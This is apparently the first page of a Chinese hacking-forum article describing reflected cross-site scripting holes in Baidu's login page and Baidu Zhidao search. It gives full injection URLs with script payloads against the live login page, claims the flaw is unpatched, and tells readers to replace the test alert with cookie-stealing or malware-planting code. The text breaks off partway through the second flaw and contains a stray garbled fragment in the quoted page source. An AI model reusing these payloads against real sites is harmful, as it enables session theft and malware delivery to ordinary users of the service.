全面解析百度XSS跨站漏洞

前一阵百度传出了input XSS漏洞，我也写也篇稿子在论坛上，今天再次来到百度，到处转了一下，结果再次发现百度多处XSS漏洞，而且在“百度知道”中发现的洞洞更是让我狂汗,下面听我一一介绍，其中百度输入框XSS漏洞不是我发布的，在同时我给大家也讲一讲，后面的都是我发现的，OK，大家跟着我探洞吧！  

1.百度用户登陆框XSS漏洞：  

这个漏洞网上前一阵有人公布了，但到现在了，漏洞还没有补了，且看原理：

登陆:http://passport.baidu.com/?login我们在用户名那输入"<>"（不包括双引号"然后密码随便吧，然后点击登陆！当然不能成功登陆的，百度提示我们：“用户名格式错误，请重新输入”，如图1

在这个页面上我们查看源码，找到用户名输入框这块的代码：

以下是引用片段： <tr><td colspan=2 align=left style="color: red ;">用户名格式错误，请重新输入</td></tr>  <tr>       <td width="56" >用户名：</td><td width="156"> <input type="text" id="username" value="<>"    class="ip"/></td> </tr> <tr> <td >密　码：</td> t3;s GxQ <td><input type="password" value="opiasduf" /></td> </tr>  <tr><td > </td>   <td> <input type="submit" value=" 登录 "/> <a href="./?getpass">忘记密码？</a></td></tr>

如上，在代码中我们清析的看到了我们输入的"<>"，而跨站最怕的就是对这二个字符进行转换，而百度显然忘了，那么我们尝试在用户名框输入跨站代码，但用户名输入框却对用户名输入字数做了限制，不够我们的跨站代码。当然这并不会难倒我们的，因为我们可以URL编码，于是我编码如下：http://passport.baidu.com/?login?&username="<script>alert(/lszm/)</script>"&passport=lszm  

直接访问，没有跨站效果，继续查看源码：

以下是引用片段： <td width="56" >用户名：</td>  <td width="156"><input type="text" id="username" value="\"<script>alert(/lszm/)</script>\""  class="ip"/></td>

http://passport.baidu.com/?login?&username="><script>alert(/lszm/)</script><"&passport=lszm

访问后，成功跨站了，如图2

至于跨站后能干什么，好多小菜都不明白，那我一句话带过吧，可以挂马，可以偷COOKIES。方法很简单，将上面URL中的<script>alert(/lszm/)</script>改成你的挂马代码或偷COOKIES代码就行啦！

2.百度知道XSS跨站

这个漏洞可以说要比上面严重多了，但相比之下方法却简单多了，因为不用我们URL编码，只要稍微对其自动改出的代码做一修改就行了！进入http://zhidao.baidu.com,最上面是一个搜索框，在那里我们可以进行答案与问题搜索，直接打入测试代码<script>alert(/lszm/)</script>, 然后搜索，没有跨站效果，查看源码：

[1] [2] [3] 下一页